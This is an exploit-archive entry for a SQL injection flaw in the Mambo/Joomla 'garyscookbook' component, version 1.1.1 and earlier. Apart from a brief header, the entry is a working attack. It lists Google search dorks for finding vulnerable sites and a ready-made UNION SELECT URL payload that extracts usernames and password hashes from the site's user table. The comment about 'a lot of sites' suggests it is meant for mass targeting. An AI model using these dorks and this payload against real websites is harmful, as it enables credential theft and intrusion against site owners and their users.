Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability

2008-02-23T00:00:00
ID 1337DAY-ID-2688
Type zdt
Reporter [email protected]
Modified 2008-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
==================================================================



###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
################################################################
#
#    there are alot site but exploit not working for all ? found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&[email protected]&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*






#  0day.today [2018-04-04]  #